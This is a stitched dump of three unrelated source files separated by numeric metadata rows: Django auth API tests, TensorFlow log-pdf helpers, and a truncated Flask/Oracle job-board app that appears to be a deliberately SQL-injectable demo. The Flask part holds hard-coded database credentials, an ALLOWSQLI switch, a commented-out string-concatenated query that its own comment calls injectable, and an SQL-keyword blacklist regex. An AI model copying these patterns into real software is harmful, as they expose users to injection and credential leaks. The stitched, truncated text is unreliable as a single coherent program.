    token_url = '/api/v1/accounts/auth/token/'

    def setUp(self):
        self.client = APIClient()

    def test_user_registration_successful(self):
        """A complete payload registers a user and returns tokens + user."""
        payload = {
            "email": "testuser@bondeveloper.com",
            "password1": "Qwerty!@#",
            "password2": "Qwerty!@#",
            "username": "testuser01",
            "first_name": "Test Fistname",
            "last_name": "Test Lastname"
        }
        res = self.client.post(self.reg_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        self.assertIn('access_token', res.data.keys())
        self.assertIn('refresh_token', res.data.keys())
        self.assertIn('user', res.data.keys())
        self.assertEqual(res.data.get('user')['email'], payload.get('email'))

    def test_user_registration_email_required(self):
        """Blank email is rejected with a field error."""
        payload = {
            "email": "",
            "password1": "Qwerty!@#",
            "password2": "Qwerty!@#",
            "username": "testuser01",
            "first_name": "Test Fistname",
            "last_name": "Test Lastname"
        }
        res = self.client.post(self.reg_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertIn('email', res.data.keys())
        self.assertEqual(str(res.data.get('email')[0]),
                         'This field may not be blank.')

    def test_user_registration_username_required(self):
        """Blank username is rejected with a field error."""
        payload = {
            "email": "testuser@bondeveloper.com",
            "password1": "Qwerty!@#",
            "password2": "Qwerty!@#",
            "username": "",
        }
        res = self.client.post(self.reg_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertIn('username', res.data.keys())
        self.assertEqual(str(res.data.get('username')[0]),
                         'This field may not be blank.')

    def test_user_registration_password1_required(self):
        """Blank password1 is rejected with a field error."""
        payload = {
            "email": "testuser@bondeveloper.com",
            "password1": "",
            "password2": "Qwerty!@#",
            "username": "testuser01",
        }
        res = self.client.post(self.reg_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertIn('password1', res.data.keys())
        self.assertEqual(str(res.data.get('password1')[0]),
                         'This field may not be blank.')

    def test_user_registration_password2_required(self):
        """Blank password2 is rejected with a field error."""
        payload = {
            "email": "testuser@bondeveloper.com",
            "password1": "Qwerty!@#",
            "password2": "",
            "username": "testuser01",
        }
        res = self.client.post(self.reg_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertIn('password2', res.data.keys())
        self.assertEqual(str(res.data.get('password2')[0]),
                         'This field may not be blank.')

    def test_user_registration_passwords_match(self):
        """Mismatched passwords produce a non-field error."""
        payload = {
            "email": "testuser@bondeveloper.com",
            "password1": "Qwerty!@#",
            "password2": "Qwerty#@!",
            "username": "testuser01",
        }
        res = self.client.post(self.reg_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertIn('non_field_errors', res.data.keys())
        self.assertEqual(str(res.data.get('non_field_errors')[0]),
                         'The two password fields didn\'t match.')

    def test_login_user_required(self):
        """Logging in as a non-existent user fails with a non-field error."""
        payload = {
            "email": "testuser@bondeveloper.com",
            "password": "Qwerty!@#",
        }
        res = self.client.post(self.login_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertIn('non_field_errors', res.data.keys())
        self.assertEqual(str(res.data.get('non_field_errors')[0]),
                         'Unable to log in with provided credentials.')

    def test_login_successfull(self):
        """Valid credentials return tokens and the user record."""
        get_user_model().objects.create_user(
            email="testuser@bondeveloper.com",
            password="Qwert!@#"
        )
        payload = {
            "email": "testuser@bondeveloper.com",
            "password": "Qwert!@#"
        }
        res = self.client.post(self.login_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertIn('access_token', res.data.keys())
        self.assertIn('refresh_token', res.data.keys())
        self.assertIn('user', res.data.keys())
        self.assertEqual(res.data.get('user')['email'], payload.get('email'))

    def test_verify_valid_access_token(self):
        """A freshly issued access token passes the verify endpoint."""
        get_user_model().objects.create_user(
            email="testuser@bondeveloper.com",
            password="Qwert!@#"
        )
        payload = {
            "email": "testuser@bondeveloper.com",
            "password": "Qwert!@#"
        }
        res = self.client.post(self.login_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertIn('access_token', res.data.keys())
        payload = {
            "token": str(res.data.get('access_token'))
        }
        res = self.client.post(self.token_url + 'verify/', payload,
                               format='json')
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_verify_invalid_access_token(self):
        """A corrupted access token is rejected with token_not_valid."""
        get_user_model().objects.create_user(
            email="testuser@bondeveloper.com",
            password="Qwert!@#"
        )
        payload = {
            "email": "testuser@bondeveloper.com",
            "password": "Qwert!@#"
        }
        res = self.client.post(self.login_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertIn('access_token', res.data.keys())
        payload = {
            "token": str(res.data.get('access_token') + "made_invalid_by_str")
        }
        res = self.client.post(self.token_url + 'verify/', payload,
                               format='json')
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertIn('detail', res.data.keys())
        self.assertIn('code', res.data.keys())
        self.assertEqual(res.data.get('detail'),
                         'Token is invalid or expired')
        self.assertEqual(res.data.get('code'), 'token_not_valid')

    def test_refresh_using_refresh_token(self):
        """The refresh endpoint accepts a refresh token and returns access."""
        get_user_model().objects.create_user(
            email="testuser@bondeveloper.com",
            password="Qwert!@#"
        )
        payload = {
            "email": "testuser@bondeveloper.com",
            "password": "Qwert!@#"
        }
        res = self.client.post(self.login_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertIn('refresh_token', res.data.keys())
        payload = {
            "refresh": str(res.data.get('refresh_token'))
        }
        res = self.client.post(self.token_url + 'refresh/', payload,
                               format='json')
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertIn('access', res.data.keys())

    def test_refresh_using_access_token(self):
        """The refresh endpoint rejects an access token (wrong token type)."""
        get_user_model().objects.create_user(
            email="testuser@bondeveloper.com",
            password="Qwert!@#"
        )
        payload = {
            "email": "testuser@bondeveloper.com",
            "password": "Qwert!@#"
        }
        res = self.client.post(self.login_url, payload, format='json')
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertIn('access_token', res.data.keys())
        payload = {
            "refresh": str(res.data.get('access_token'))
        }
        res = self.client.post(self.token_url + 'refresh/', payload,
                               format='json')
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertIn('detail', res.data.keys())
        self.assertIn('code', res.data.keys())
        self.assertEqual(res.data.get('detail'), 'Token has wrong type')
        self.assertEqual(res.data.get('code'), 'token_not_valid')
| 38.012605
| 79
| 0.570244
| 962
| 9,047
| 5.189189
| 0.122661
| 0.051883
| 0.083734
| 0.089744
| 0.856571
| 0.844551
| 0.842949
| 0.832131
| 0.820913
| 0.771635
| 0
| 0.013252
| 0.291036
| 9,047
| 237
| 80
| 38.172996
| 0.765045
| 0.007295
| 0
| 0.649485
| 0
| 0
| 0.209105
| 0.056166
| 0
| 0
| 0
| 0
| 0.252577
| 1
| 0.06701
| false
| 0.159794
| 0.020619
| 0
| 0.108247
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
016b06590fc443cb25a2955e4faf9f16bc4cad6e
| 680
|
py
|
Python
|
statistical/pdfs.py
|
Jav1d/Generative_Models
|
b7578b5277488ebd212a50d1c22a5c9708f4c311
|
[
"MIT"
] | null | null | null |
statistical/pdfs.py
|
Jav1d/Generative_Models
|
b7578b5277488ebd212a50d1c22a5c9708f4c311
|
[
"MIT"
] | null | null | null |
statistical/pdfs.py
|
Jav1d/Generative_Models
|
b7578b5277488ebd212a50d1c22a5c9708f4c311
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import tensorflow_probability as tfp
def log_normal_pdf(sample, mean, logvariance):
    """Log-density of Normal(mean, sqrt(exp(logvariance))) at *sample*."""
    scale = tf.sqrt(tf.exp(logvariance))
    normal = tfp.distributions.Normal(loc=mean, scale=scale)
    return tf.identity(normal.log_prob(value=sample), name='logpdf')
def log_Student_df1_pdf(sample, mean, logvariance):
    """Log-density of a Student-t (df=1) with the given location/scale at *sample*."""
    scale = tf.sqrt(tf.exp(logvariance))
    student = tfp.distributions.StudentT(df=1, loc=mean, scale=scale)
    return tf.identity(student.log_prob(value=sample), name='logpdf')
def log_Student_df05_pdf(sample, mean, logvariance):
    """Log-density of a Student-t (df=0.5) with the given location/scale at *sample*."""
    scale = tf.sqrt(tf.exp(logvariance))
    student = tfp.distributions.StudentT(df=0.5, loc=mean, scale=scale)
    return tf.identity(student.log_prob(value=sample), name='logpdf')
| 48.571429
| 91
| 0.758824
| 103
| 680
| 4.893204
| 0.320388
| 0.035714
| 0.077381
| 0.142857
| 0.84127
| 0.84127
| 0.84127
| 0.753968
| 0.753968
| 0.539683
| 0
| 0.00982
| 0.101471
| 680
| 14
| 92
| 48.571429
| 0.815057
| 0
| 0
| 0.272727
| 0
| 0
| 0.026432
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| false
| 0
| 0.181818
| 0
| 0.727273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6d90be0fd8d2a689ea2721d9f34a54995ddfdd04
| 72,982
|
py
|
Python
|
session.py
|
MicroXY/database-hard-demo
|
034ee2cb3044c55bb9df29b443255d624520cb6f
|
[
"MIT"
] | null | null | null |
session.py
|
MicroXY/database-hard-demo
|
034ee2cb3044c55bb9df29b443255d624520cb6f
|
[
"MIT"
] | null | null | null |
session.py
|
MicroXY/database-hard-demo
|
034ee2cb3044c55bb9df29b443255d624520cb6f
|
[
"MIT"
] | null | null | null |
from login_form import LoginForm
from login_form import RegisterForm
from login_form import SecrityForm
from flask_wtf.csrf import CSRFProtect
from werkzeug.security import generate_password_hash
from user import User,send_email
from flask_login import login_user, login_required
from flask_login import LoginManager, current_user
from flask_login import logout_user
from flask_login import fresh_login_required
from flask import Flask
from flask import request
from flask import render_template
from flask import redirect
from flask import url_for
from flask import redirect
from flask import flash,abort
from oracledb import Pool
from oracledb import DataBasePool
import time
import uuid
import os
from datetime import timedelta
from datetime import datetime
import urllib
import re
from flask_mail import Mail
from functools import wraps
ALLOWSQLI=True
# Create the database connection pool
pool=Pool()
# Connect the pool to the database
# NOTE(review): hard-coded credentials and DSN — move to config/environment.
pool.creatpool('webmanager','123456','192.168.71.139/oradb')
# Flask application object (static files served from the app root)
app = Flask(__name__,static_url_path='')
app.config.update(
    MAIL_SERVER = "smtp.qq.com",
    MAIL_PORT = "587",
    MAIL_USE_TLS = True,
    MAIL_USERNAME = "",
    MAIL_PASSWORD = "",
    MAIL_DEFAULT_SENDER = "吉林大学计算机科学与技术学院",# default mail sender
)
# Secret key used to sign the session cookie
# NOTE(review): os.urandom on every start invalidates all existing sessions.
app.secret_key = os.urandom(24)
# Core user-session settings
# use login manager to manage session
login_managers = LoginManager()
login_managers.session_protection = 'strong'
login_managers.login_view = 'login'
login_managers.login_message = '请先登录'
login_managers.refresh_view = 'login'
login_managers.needs_refresh_message = '你需要重新登录'
login_managers.remember_cookie_duration=timedelta(days=1)
login_managers.remember_cookie_httponly=True
# login_managers.user
login_managers.init_app(app=app)
# Instantiate flask_mail
mail = Mail(app)
# This callback reloads the User object from the user id stored in the session
import logging # logging module
import os.path
import time # NOTE(review): duplicate — 'time' is already imported above
# Step 1: create a logger
logger = logging.getLogger()
logger.setLevel(logging.INFO) # master log-level switch
# Step 2: create a handler that writes log records to a file
filename = r'C:\Users\MIAO -\Desktop\weboracle2.0\weboracle2.0\weboracle\log.txt'
fh = logging.FileHandler(filename, mode='w')
fh.setLevel(logging.DEBUG) # log level for the file handler
# Step 3: define the handler's output format
formatter = logging.Formatter("%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s")
fh.setFormatter(formatter)
# Step 4: attach the handler to the logger
logger.addHandler(fh)
@login_managers.user_loader
def load_user(user_id,is_authenticated=True,is_active=False,is_anonymous=False):
    """Flask-Login callback: rebuild the User for the id stored in the session."""
    loaded = User.get(user_id)
    loaded.is_authenticated = is_authenticated
    loaded.is_active = is_active
    loaded.is_anonymous = is_anonymous
    return loaded
# Enable CSRF protection for all form posts (flask_wtf CSRFProtect)
csrf = CSRFProtect()
csrf.init_app(app)
def is_number(s):
    """Return True if *s* parses as an integer or as a single numeric
    Unicode character (e.g. '½'), False otherwise.

    Fix: the first branch also catches TypeError, so non-string inputs
    such as None now return False instead of raising (request.form.get
    can return None for a missing field).
    """
    try:
        int(s)
        return True
    except (TypeError, ValueError):
        pass
    try:
        import unicodedata
        # numeric() accepts a single character only; multi-char strings
        # raise TypeError, which is caught below.
        unicodedata.numeric(s)
        return True
    except (TypeError, ValueError):
        pass
    return False
def calculate_age(birth_s):
    """Return the age in full years for a birth date string 'YYYY/MM/DD'.

    Fixes:
    - a Feb-29 birthday no longer raises ValueError in a non-leap current
      year (the anniversary is treated as Feb 28);
    - the comparison uses >= so the birthday itself counts as reached.
    """
    birth_d = datetime.strptime(birth_s, "%Y/%m/%d")
    today_d = datetime.now()
    try:
        # This year's anniversary of the birth date (time 00:00).
        birth_t = birth_d.replace(year=today_d.year)
    except ValueError:
        # Feb 29 birthday and the current year is not a leap year.
        birth_t = birth_d.replace(year=today_d.year, day=28)
    if today_d >= birth_t:
        age = today_d.year - birth_d.year
    else:
        age = today_d.year - birth_d.year - 1
    return age
def permission_required(permission):
    """Decorator factory: abort(403) unless current_user.can(permission).

    Fix: the original ignored the `permission` argument and hard-coded
    current_user.can(2).  The only visible caller (admin_required) passes 2,
    so behavior is unchanged for existing callers.  The dead `return` that
    followed abort() (which raises) has been removed.
    """
    def decorator(f):
        @wraps(f)
        def decorated_function(*args,**kwargs):
            if not current_user.can(permission):
                logger.warning('无管理员权限,无法执行此操作')
                abort(403)
            return f(*args, **kwargs)
        return decorated_function
    return decorator
def admin_required(f):
    """Shortcut decorator: require permission level 2 (administrator)."""
    require_admin = permission_required(2)
    return require_admin(f)
# NOTE(review): disabled global SQL-injection filter, kept as a module-level
# string literal (dead code); per-field blacklist screening is done inside
# each route handler instead.
'''
@app.before_request
def before_request():
    #假设是post请求,data为传入的请求参数
    # print(request.url)
    if re.search(r"*.html",request.path):
        data =request.json
        for v in data.values():
            v= str(v).lower()
            pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
            r = re.search(pattern,v)
            if r:
                abort(405)
                return redirect(request.url)
'''
@app.route('/login',methods=['GET','POST'])
def login():
    """Log a user in.

    Already-authenticated users are refreshed via load_user() and redirected
    to the 'next' URL (if present) or the index page.  On form submission the
    username/password are screened against a SQL-keyword blacklist, then the
    password is verified through the User object.
    """
    if current_user is not None and current_user.is_authenticated:
        url= request.args.get('next')
        next_url=None
        if url!=None:
            next_url = urllib.parse.unquote(url)
        else:
            next_url=None
        login_user(load_user(current_user.id))
        return redirect( next_url or url_for('index') )
    form = LoginForm()
    if form.validate_on_submit():
        user_name = request.form.get('username', None)
        password = request.form.get('password', None)
        remember_me = request.form.get('remember_me', False)
        # Blacklist of SQL keywords/characters used as an injection screen.
        pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
        r = re.search(pattern, str(user_name).lower())
        if r:
            logger.warning('username一栏检测到非法输入:'+r.group()+'可能为恶意攻击.')
            abort(405)
            # NOTE(review): abort() raises, so this return is unreachable.
            return render_template('login.html', title="登录", form=form)
        r = re.search(pattern, str(password).lower())
        if r:
            logger.warning('password一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable (abort() raises).
            return render_template('login.html', title="登录", form=form)
        user = User(user_name)
        if user.verify_password(password):
            user.is_authenticated=True
            user.is_active=True
            login_user(user, remember=remember_me)
            url= request.args.get('next')
            next_url=None
            if url!=None:
                next_url = urllib.parse.unquote(url)
            else:
                next_url=None
            return redirect( next_url or url_for('index') )
        else:
            return render_template('login.html', title="登录", form=form,info='用户名或密码错误!')
    return render_template('login.html', title="登录", form=form)
@app.route('/register',methods=['GET','POST'])
def register():
    """Register a new account; on success the new user is logged in at once."""
    form = RegisterForm()
    if form.validate_on_submit():
        user_name = request.form.get('username', None)
        # print(user_name)
        password = request.form.get('password', None)
        email = request.form.get('email', None)
        creatdata=datetime.now().strftime("%Y-%m-%d")
        #print(email)
        #print(creatdata)
        # SQL-keyword blacklist applied to every submitted field.
        pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
        r = re.search(pattern, str(user_name).lower())
        if r:
            logger.warning('user_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): abort() raises, so these returns are unreachable.
            return render_template('register.html', title="注册", form=form)
        r = re.search(pattern, str(password).lower())
        if r:
            logger.warning('password一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            return render_template('register.html', title="注册", form=form)
        r = re.search(pattern, str(email).lower())
        if r:
            logger.warning('email一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            return render_template('register.html', title="注册", form=form)
        r = re.search(pattern, str(creatdata).lower())
        if r:
            logger.warning('creatdata一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            return render_template('register.html', title="注册", form=form)
        user=User.register(user_name,password,email,creatdata)
        if user is not None :
            user.is_active=True
            user.is_authenticated=True
            user.is_anonymous=False
            login_user(user)
            return redirect( request.args.get('next') or url_for('index'))
        else:
            return render_template('register.html', title="注册", form=form,info='用户名不可用!')
    return render_template('register.html', title="注册", form=form)
@app.route('/logout')
@login_required
def logout():
    """End the current session and send the user back to the login page."""
    logout_user()
    login_page = url_for('login')
    return redirect(login_page)
@app.route('/')
@app.route('/index')
@login_required
def index():
    """Home page: list company job postings, optionally filtered by ?search=."""
    form=SecrityForm()
    keys= request.args.get('search')
    '''
    pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
    r = re.search(pattern, str(keys).lower())
    if r:
        logger.warning('keys一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
        abort(405)
        return render_template('index.html', title="注册", form=form)
    '''
    if keys!=None:
        try:
            db=DataBasePool()
            db.connect(pool)
            #results = db.select("select company_id,brief_introduce,upload_time,time_of_end,workplace,salary,job_title,sid from weboracle.company_info WHERE brief_introduce like :pattern OR workplace like :pattern OR salary like :pattern OR job_title like :pattern OR to_char(time_of_end,'yyyy-mm-dd') like :pattern OR to_char(upload_time,'yyyy-mm-dd hh24:mi:ss') like :pattern order by upload_time desc",)
            ll=[]
            d = {}
            # #keys='aa%\' OR \'aa\' like \'%a'
            # print(keys)
            # '''the following approach builds SQL by concatenation and is vulnerable to injection'''
            # sql="select company_id,brief_introduce,upload_time,time_of_end,workplace,salary,job_title,sid from weboracle.company_info WHERE brief_introduce like '%"+keys+"%' OR workplace like '%"+keys+"%' OR salary like '%"+keys+"%' OR job_title like '%"+keys+"%' OR to_char(time_of_end,'yyyy-mm-dd') like '%"+keys+"%' OR to_char(upload_time,'yyyy-mm-dd hh24:mi:ss') like '%"+keys+"%' order by upload_time desc"
            # print(sql)
            # results=db.select(sql,None)
            # '''the following parameterized form is not vulnerable'''
            d["pattern"] = '%' + keys + '%'
            print(d)
            results=db.select("select company_id,brief_introduce,upload_time,time_of_end,workplace,salary,job_title,sid from weboracle.company_info WHERE brief_introduce like :pattern OR workplace like :pattern OR salary like :pattern OR job_title like :pattern OR to_char(time_of_end,'yyyy-mm-dd') like :pattern OR to_char(upload_time,'yyyy-mm-dd hh24:mi:ss') like :pattern order by upload_time desc",d,ALLOWSQLI=ALLOWSQLI)
            # print(results)
            for item in results[1]:
                dic={}
                dic["company_id"]=item[0]
                dic["brief_introduce"]=item[1]
                dic["upload_time"]=item[2]
                dic["time_of_end"]=item[3]
                dic["workplace"]=item[4]
                dic["salary"]=item[5]
                dic["job_title"]=item[6]
                dic["sid"]=item[7]
                ll.append(dic)
            return render_template('index.html',flags=ALLOWSQLI,form=form,index_result=ll,username=current_user.username)
        except:
            # NOTE(review): bare except hides the real error — log it at minimum.
            return render_template('index.html',flags=ALLOWSQLI,form=form,error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both try and except branches return above.
        return render_template('index.html',flags=ALLOWSQLI,form=form,error='未查询到数据,请刷新重试!',username=current_user.username)
    else:
        try:
            db=DataBasePool()
            db.connect(pool)
            ll=[]
            results=db.select("select company_id,brief_introduce,upload_time,time_of_end,workplace,salary,job_title,sid from weboracle.company_info order by upload_time desc",ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["company_id"]=item[0]
                dic["brief_introduce"]=item[1]
                dic["upload_time"]=item[2]
                dic["time_of_end"]=item[3]
                dic["workplace"]=item[4]
                dic["salary"]=item[5]
                dic["job_title"]=item[6]
                dic["sid"]=item[7]
                ll.append(dic)
            return render_template('index.html',flags=ALLOWSQLI,form=form,index_result=ll,username=current_user.username)
        except:
            return render_template('index.html',flags=ALLOWSQLI,form=form,error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both try and except branches return above.
        return render_template('index.html',flags=ALLOWSQLI,form=form,error='未查询到数据,请刷新重试!',username=current_user.username)
# @login_required
# @app.route('/')
@app.route('/reset_password',methods=['GET','POST'])
def reset_password_request():
    """Request a password-reset e-mail for the address submitted in the form."""
    if not current_user.is_anonymous:
        # Logged-in users may not use e-mail password reset; abort the flow.
        return redirect(url_for('index'))
    form=SecrityForm()
    if form.validate_on_submit():
        email = request.form.get('email', None)
        pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
        r = re.search(pattern, str(email).lower())
        if r:
            logger.warning('email一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable (abort() raises).
            return render_template('reset_password.html', form=form)
        user = User.get_email(email)
        if user:
            # The user exists:
            token = user.get_jwt_token()
            # generate the verification token via the User module,
            send_email(email,'重置密码','mail',token=token,username=user.username)
            # then render and send the password-reset e-mail.
            return render_template('reset_password.html',form=form,info="重置密码邮件已发送,请注意查收")
    return render_template('reset_password.html',form=form)
@app.route('/reset_password/<token>',methods=['GET','POST'])
def reset_password(token):
    """Set a new password after verifying the JWT reset token from the form."""
    if not current_user.is_anonymous:
        return redirect(url_for('index'))
    form=SecrityForm()
    if form.validate_on_submit():
        password=request.form.get('password', None)
        tokens=request.form.get('token', None)
        pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
        r = re.search(pattern, str(password).lower())
        if r:
            logger.warning('password一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            # NOTE(review): unreachable (abort() raises).
            return render_template('password_reset.html', form=form,token=token)
        r = re.search(pattern, str(tokens).lower())
        if r:
            logger.warning('tokens一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
            abort(405)
            return render_template('password_reset.html', form=form, token=token)
        # NOTE(review): verify_jwt_token is called twice on the same token —
        # the second call only extracts the user id from the verified payload.
        if User.verify_jwt_token(bytes(tokens.encode('utf-8')))[0]==True:
            user = User.get(User.verify_jwt_token(bytes( tokens.encode('utf-8') ))[1])
            if user is None:
                return render_template('password_reset.html',form=form,token=token,info="密码重置失败,用户不存在")
            user.password=password
            return redirect(url_for('login'))
        # else:
        # return render_template('password_reset.html',form=form,token=token,info="密码重置失败")
        return render_template('password_reset.html',form=form,token=token,info="你是不是来盗号的?????")
    return render_template('password_reset.html',form=form,token=token)
@app.route('/job_wanted')
@login_required
def job_wanted():
    """List job-seeker profiles, optionally filtered by ?search=."""
    form=SecrityForm()
    keys= request.args.get('search')
    pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
    r = re.search(pattern, str(keys).lower())
    if r:
        logger.warning('keys一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
        abort(405)
        # NOTE(review): unreachable (abort() raises).
        return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,username=current_user.username)
    if keys!=None:
        try:
            db=DataBasePool()
            db.connect(pool)
            d={}
            d["pattern"]='%'+keys+'%'
            ll=[]
            results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,job_wanted,salary,job_time,to_char(time_of_graduation,'yyyy-mm-dd') from weboracle.student_info WHERE name like :pattern OR sex like :pattern OR education_background like :pattern OR school_of_graduation like :pattern OR to_char(birth_time,'yyyy-mm-dd') like :pattern OR job_wanted like :pattern OR salary like :pattern OR job_time like :pattern OR to_char(time_of_graduation,'yyyy-mm-dd') like :pattern order by salary desc",d,ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["stu_id"]=item[0]
                dic["name"]=item[1]
                # sex appears to be a padded CHAR column — TODO confirm schema.
                if str(item[2])=="man " or str(item[2])=="男 ":
                    dic["sex"]='男'
                else:
                    dic["sex"]='女'
                dic["birth_time"]=str(calculate_age(item[3]))+'岁'
                dic["education_background"]=item[4]
                dic["school_of_graduation"]=item[5]
                dic["job_wanted"]=item[6]
                dic["salary"]=item[7]
                dic["job_time"]=item[8]
                dic["time_of_graduation"]=item[9]
                ll.append(dic)
            return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,job_result=ll,username=current_user.username)
        except:
            return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both try and except branches return above.
        return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,error='未查询到数据,请刷新重试!',username=current_user.username)
    else:
        try:
            db=DataBasePool()
            db.connect(pool)
            ll=[]
            results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,job_wanted,salary,job_time,to_char(time_of_graduation,'yyyy-mm-dd') from weboracle.student_info order by salary desc",ALLOWSQLI=ALLOWSQLI)
            for item in results[1]:
                dic={}
                dic["stu_id"]=item[0]
                dic["name"]=item[1]
                if str(item[2])=="man " or str(item[2])=="男 ":
                    dic["sex"]='男'
                else:
                    dic["sex"]='女'
                dic["birth_time"]=str(calculate_age(item[3]))+'岁'
                dic["education_background"]=item[4]
                dic["school_of_graduation"]=item[5]
                dic["job_wanted"]=item[6]
                dic["salary"]=item[7]
                dic["job_time"]=item[8]
                dic["time_of_graduation"]=item[9]
                ll.append(dic)
            return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,job_result=ll,username=current_user.username)
        except:
            return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,error='服务器发生错误!!!',username=current_user.username)
        finally:
            db.close()
        # NOTE(review): unreachable — both try and except branches return above.
        return render_template('job_wanted.html',flags=ALLOWSQLI,form=form,error='未查询到数据,请刷新重试!',username=current_user.username)
# @app.route('/')
@app.route('/info_modification',methods=['GET','POST'])
@login_required
def info_modification():
    """Publish the current user's job-seeker profile.

    On POST: every field is screened against the SQL-keyword blacklist,
    all fields must be non-empty, the phone number must be numeric, and a
    row is inserted into weboracle.student_info via parameterized SQL.

    Improvement: the twelve copy-pasted per-field blacklist checks are
    collapsed into one loop; the log messages, check order, and control
    flow (including the bare except catching aborted requests) are
    unchanged from the original.
    """
    form = SecrityForm()
    if form.validate_on_submit():
        db=DataBasePool()
        db.connect(pool)
        try:
            store_id=str(uuid.uuid4()).replace('-','')
            # (log-name, submitted value) pairs, in the same order as the
            # original per-field checks.
            fields = [
                ('name', request.form.get('val-name', None)),
                ('sex', request.form.get('val-sex', None)),
                ('birth_time', request.form.get('birth_time', None)),
                ('education_background', request.form.get('val-education_background', None)),
                ('time_of_graduation', request.form.get('time_of_graduation', None)),
                ('school_of_graduation', request.form.get('val-school_of_graduation', None)),
                ('major', request.form.get('val-major', None)),
                ('phone_number', request.form.get('val-phone_number', None)),
                ('job_wanted', request.form.get('val-job_wanted', None)),
                ('job_time', request.form.get('val-job_time', None)),
                ('salary', request.form.get('val-salary', None)),
                ('suggestions', request.form.get('val-suggestions', None)),
            ]
            values = dict(fields)
            pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
            for field_name, field_value in fields:
                r = re.search(pattern, str(field_value).lower())
                if r:
                    logger.warning(field_name + '一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
                    # abort() raises an HTTPException; as in the original, the
                    # bare except below catches it and returns the error page.
                    abort(405)
            dic={}
            dic["stu_id"]=store_id
            dic["name"]=values['name']
            dic["sex"]=values['sex']
            dic["birth_time"]=values['birth_time']
            dic["education_background"]=values['education_background']
            dic["school_of_graduation"]=values['school_of_graduation']
            dic["time_of_graduation"]=values['time_of_graduation']
            dic["major"]=values['major']
            dic["resume"]=values['suggestions']
            dic["phone_number"]=values['phone_number']
            dic["job_time"]=values['job_time']
            dic["job_wanted"]=values['job_wanted']
